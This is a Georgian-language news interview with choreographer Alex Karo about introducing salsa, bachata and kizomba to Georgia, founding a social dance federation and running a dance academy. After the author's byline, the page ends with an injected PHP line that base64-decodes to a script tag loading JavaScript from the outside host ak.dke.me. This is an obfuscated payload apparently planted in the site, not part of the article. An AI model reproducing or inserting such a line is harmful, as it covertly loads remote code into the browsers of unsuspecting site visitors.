celsiusi
ავერსი საქკაბელი

Salsa, Bachata და Kizomba - ეს ცეკვები საქართველოში უკვე უცხო აღარაა, თუმცა რამდენად მიიღო საზოგადოებამ აღნიშნული ცეკვები და როგორია დამოკიდებულება ცეკვის ამ მიმართულებებისადმი ამაზე მეტის გასაგებად, საინფორმაციო სააგენტოო „ბიზნესთაიმი“ სოციალური ცეკვების საერთაშორისო ინსტრუქტორს, სოციალური ცეკვების ფედერაციის პრეზიდენტს, ცეკვების: Salsa-ს, Bachata-ს და Kizomba-ს ფუძემდებელს საქართველოში, "Caliente Dance Academy"-ს მფლობელს, ქორეოგრაფ ალექს კაროს (ალექსანდრე კაროევს) ესაუბრა.

თქვენ ხართ ცეკვების: სალსა, ბაჩატა და კიზომბას ფუძემდებელი საქართველოში, რამ განაპირობა თქვენი ინტერესი ცეკვების ამ კონკრეტული მიმართულებების მიმართ?

ყველაფერი დაიწყო სამეჯლისო ცეკვებით. სადაც მასწავლებელმა რამოდენიმეჯერ ჩაგვირთო სალსას მუსიკა, რაც გაგვიკვირდა, რადგან სამეჯლისო პროგრამაში როგორც წესი არ შედის სალსა და ის სალსა რაც იქ ისწავლება, საერთოდ სხვა რამ არის, რომელიც სოციალური ცეკვების წესებს სრულიად აცდენილია. შეიძლება უბრალოდ სამეჯლისო სალსა დავარქვათ. მუსიკა იმდენად მომეწონა და შემიყვარდა, მასწავლებელს ლამის ყოველ გაკვეთილზე ვეხვეწებოდი, რომ სალსა ჩაერთო და გვეცეკვა. მერე კი რა თქმა უნდა ჩავუღრმავდი, დავიწყე ინტერნეტში ძებნა და აღმოვაჩინე, რომ ნამდვილი სალსა სულ სხვანაირად იცეკვება. რის შემდეგაც დავიწყე საზღვრებს გარეთ წასვლა და მასტერკლასების აღება, რომ შემესწავლა ნამდვილი სალსა.

FB IMG 1724177695708

როდის დაარსდა სოციალური ცეკვების ფედერაცია და საიდან გაჩნდა იდეა, რამაც გაფიქრებინათ ამ ფედერაციის დაარსება?

ფედერაცია დავაარსეთ 2014-ში. ეს განაპირობა იმან რომ ოცნებად მქონდა ქცეული, ჩვენთან საქართველოში განვითარებულიყო ეს მიმართულება, გახსნილიყო სკოლები, ჩატარებულიყო ფესტივალები, შექმნილიყო სოციალური ცეკვების ქომიუნითი.

როგორ მიიღეს საქართველოში თქვენი ინიციატივა და რა რეაქცია მოყვა მას საზოგადოების მხრიდან?

თავდაპირველად ყველა სკეპტიკურად უყურებდა ამ ყველაფერს და არავის სჯეროდა, რომ ეს იდეა გაამართლებდა. თუმცა დროთაგანმავლობაში, როცა ნელ ნელა განვავითარეთ, მერე უკვე მიიღო ხალხმა და ახლა უკვე შედარებით მოთხოვნადია. იგივე ადამიანები, ვისაც არ სჯეროდათ, დღეს თავად არიან ჩართულები და თვითონვე გვიწევენ რეკომენდაციას.

რამდენად არის ეს ცეკვები მოთხოვნადი და რა ეტაპზეა დღეს სალსა, ბაჩატა და კიზომბა საქართველოოში?

ამ დროისთვის უკვე რამდენიმე სკოლა არსებობს, ყოველკვირეული ღონისძიებები და ფესტივალები ტარდება, სადაც არამხოლოდ მეზობელი ქვეყნები ერთვებიან, არამედ ევროპაც.

FB IMG 1724080606837

საქართველოში ყველამ იცის რომ სალსა, ბაჩატა და კიზომბა თქვენს სახელთან ასოცირდება, ტელეგადაცემებშიც ხშირად გისაუბრიათ აღნიშნულზე, თუმცა, ხომ არ ფიქრობთ რომ საჭიროა ბევრად მეტის გაკეთება, რომ ეს ცეკვები საზოგადოებამ მეტად მიიღოს და შეიყვაროს?

მაქსიმუმს ვაკეთებთ ჩვენი ძალებით რაც შეგვიძლია, მაგრამ ამის განვითარებისათვის აუცილებელია სპონსორების მოძიება. ვისაც ეკუთვნის კულტურული მხარის განვითარება საქართველოში, მაგალითად კულტურის სამინისტრო და სხვა სპონსორები ვინც ამ მიმართულებას ასპონსორებს, მათი ყურადღების მიბყრობაა საჭირო, რომ ცეკვის ეს მიმართულებები კიდევ უფრო მეტად პოპულარული და მოთხოვნადი გავხადოთ.

თქვენ ხართ ასევე "Calient Dance Academy"-ს მფლობელი, რომელიც 2014 წელს გაიხსნა და დღემდე ატარებს გაკვეთილებს, ძირითადად რა ასაკის მოსწავლეები გყავთ და როგორია მათი დამოკიდებულება ამ ცეკვებისადმი?

ყველანაირი ასაკის ხალხი გვყავს, 16-დან 80-წლამდე, გამოვირჩევით მეგობრული დამოკიდებულებით. მათ ვისაც მოსწონთ ძალიან უნდათ და ცდილობენ თავიანთი სამეგორო წრეც ჩართონ და ყოველთვის რეკომენდაციას გვიწევენ. ასევე, ბევრი შემთხვევა გვაქვს, სადაც ფსიქოლოგები და ექიმები გვიგზავნიან ხალხს სტრესის მოსახსნელად. ხშირად გვყავს ისეთებიც, ვინც ამბობს, რომ ჩვენთან მოსვლამდე ანტიდეპრესანტებს ღებულობდა და ცეკვა იმდენად დაეხმარა, რომ ამ ტიპის მედიკამენტების მიღება შეწყვიტა.

Screenshot 20240816 101404 Facebook

მინდა თქვენს პირად მიღწევებზე და ჯილდოებზე გკითხოთ, ჩვენ ვიცით, რომ არაერთი სიგელი, ჯილდო, თუ დიპლომი გაქვთ მიღებული...

მიღწევა ის არის, რომ საკმაოდ ზრდასრულ ასაკში, როცა სხვები კარიერას ამთავრებდნენ, უკვე გავედი საერთაშორისო ასპარესზე, როგორც საერთაშორისო ინსტრუქტორი. მიღწევაა, რომ საქართველო ამ კუთხით არავის არ გაუტანია საზღვარგარეთ და მე გავაცანი საქართველო მსოფლიოს სოციალური ცეკვების მიმართულებით.

ასევე 2017 წელს დავჯილდოვდი როგორც წლის პერსონა, კულტურის განვითარებაში შეტანილი წვლილისთვის...

როგორია თქვენი სამომავლო გეგმები? რა მიზნები გაქვთ დასახული ახლო მომავალში?

სამომავლოდ ვგეგმავ კიდევ უფრო განვავითარო საქართველოში ეს მიმართულება, რა თქმა უნდა მეც ვგეგმავ კიდევ უფრო განვვითარდე და რაც შეიძლება მეტი სტუდია და მეტი ხალხი იყოს ჩართული ამ მიმართულებით.

ასევე მაქვს მიზანი, რომ საქართველოში ერთერთი ყველაზე დიდი ცეკვის საერთაშორისო ფესტივალი იმართებოდეს ყოველწლიურად, ეს უბრალოდ დროის ამბავია, რადგან როგორც ზემოთ აღვნიშნე, საჭიროა მეტი სტუდია და მეტი ხალხი იყოს ჩართილი, რომელიც შემდგომ მოახდენს უკვე საზღვარგარეთიდან ხალხის მოზიდვას. როცა დიდ ფესტივალებზე ვმოგზაურობ ხოლმე, სადაც პლიუს 4000 დამსწრე ყავთ, გული მწყდება რომ ეს ჩვენთან არ ხდება, თუმცა მჯერა, რომ ეს მიღწევადია და აუცილებლად დადგება ჩვენთანაც ამის დრო!

ავტორი
მირანდა შურღაია
3633
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");